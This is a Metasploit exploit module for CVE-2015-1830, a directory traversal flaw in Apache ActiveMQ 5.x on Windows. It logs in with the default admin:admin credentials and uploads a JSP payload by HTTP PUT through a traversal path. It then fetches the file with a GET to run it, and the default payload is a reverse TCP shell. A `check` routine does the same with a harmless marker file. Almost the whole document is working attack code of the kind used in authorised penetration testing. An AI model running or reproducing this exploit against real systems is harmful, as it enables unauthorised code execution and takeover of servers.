##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for CVE-2015-1830 (Apache ActiveMQ 5.x before 5.11.2, Windows).
#
# Both `check` and `exploit` follow the same three-step shape: an authenticated
# HTTP PUT through the traversal path in datastore['PATH'], an authenticated
# HTTP GET of the resulting file under admin/, and (in `check` only) a DELETE
# to clean up. The module metadata already declares ARTIFACTS_ON_DISK and
# IOC_IN_LOGS: every run writes a randomly named .jsp file under the admin
# directory and emits PUT/GET(/DELETE) requests that the target can log.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the four user-facing options
  # (TARGETURI, PATH, USERNAME, PASSWORD). Defaults target the stock
  # ActiveMQ web console (port 8161, admin:admin).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',
        'Description' => %q{
          This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache
          ActiveMQ 5.x before 5.11.2 for Windows.

          The module tries to upload a JSP payload to the /admin directory via the traversal
          path /fileserver/..\admin\ using an HTTP PUT request with the default ActiveMQ
          credentials admin:admin (or other credentials provided by the user). It then issues
          an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the
          payload and obtain a shell.
        },
        'Author' => [
          'David Jorm', # Discovery and exploit
          'Erik Wynter' # @wyntererik - Metasploit
        ],
        'References' => [
          ['CVE', '2015-1830'],
          ['EDB', '40857'],
          ['URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt']
        ],
        'Privileged' => false,
        'Platform' => %w[win],
        'Targets' => [
          [
            'Windows Java',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ],
        ],
        'DisclosureDate' => '2015-08-19',
        'License' => MSF_LICENSE,
        'DefaultOptions' => {
          'RPORT' => 8161,
          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
        },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # Each run leaves a .jsp under admin/ (check deletes its own; exploit does not)
          # and the PUT/GET requests are visible to whatever logs the target keeps.
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
      # Single-quoted, so the literal value is /fileserver/..\admin\ (one backslash each).
      OptString.new('PATH', [true, 'Traversal path', '/fileserver/..\\admin\\']),
      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin'])
    ])
  end

  # Vulnerability check.
  #
  # Writes a throwaway JSP (random name, random marker string) through the
  # traversal path, then fetches it via admin/ and looks for the marker in
  # the response body. On a hit the file is deleted and Vulnerable is
  # returned; otherwise Safe.
  #
  # @return [Exploit::CheckCode] Vulnerable or Safe
  def check
    print_status('Running check...')
    testfile = Rex::Text.rand_text_alpha(10)
    testcontent = Rex::Text.rand_text_alpha(10)
    # The PUT response is not inspected; success is judged solely by the GET below.
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
      'headers' => {
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
      },
      'method' => 'PUT',
      # Minimal JSP that only echoes the random marker, so the check is
      # distinguishable from the real payload upload in `exploit`.
      'data' => "<% out.println(\"#{testcontent}\");%>"
    })
    res1 = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "admin/#{testfile}.jsp"),
      'headers' => {
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
      },
      'method' => 'GET'
    })
    if res1 && res1.body.include?(testcontent)
      # Best-effort cleanup of the test file. The second argument is the
      # request timeout (1 s) and the response is ignored, so a failed DELETE
      # silently leaves the test .jsp on disk.
      send_request_cgi(
        {
          'uri' => normalize_uri(target_uri.path, "admin/#{testfile}.jsp"),
          'headers' => {
            'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
          },
          'method' => 'DELETE'
        },
        1
      )
      return Exploit::CheckCode::Vulnerable
    end
    # NOTE(review): a nil res1 (no response at all, e.g. host unreachable) also
    # ends up here and is reported as Safe; CheckCode::Unknown would describe
    # that case more accurately.
    Exploit::CheckCode::Safe
  end

  # Uploads the encoded JSP payload through the traversal path and requests
  # it via admin/ to trigger execution. The uploaded file is not removed.
  #
  # @raise [Msf::Exploit::Failed] via fail_with(Failure::PayloadFailed) when
  #   the triggering GET does not return HTTP 200 (or returns nothing)
  def exploit
    print_status('Uploading payload...')
    # Random 10-character filename; the same name is used for upload and trigger.
    testfile = Rex::Text.rand_text_alpha(10)
    # Printed so the operator can reach the uploaded file by hand if the PUT
    # succeeds but the triggering GET below fails.
    vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp")

    # As in `check`, the PUT response is not examined.
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
      'headers' => {
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
      },
      'method' => 'PUT',
      'data' => payload.encoded
    })

    print_status('Payload sent. Attempting to execute the payload.')
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "admin/#{testfile}.jsp"),
      'headers' => {
        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
      },
      'method' => 'GET'
    })
    # Success is inferred only from the GET's status code; the session itself
    # (if any) is established by the payload, not by this check.
    if res && res.code == 200
      print_good('Payload executed!')
    else
      fail_with(Failure::PayloadFailed, 'Failed to execute the payload')
    end
  end
end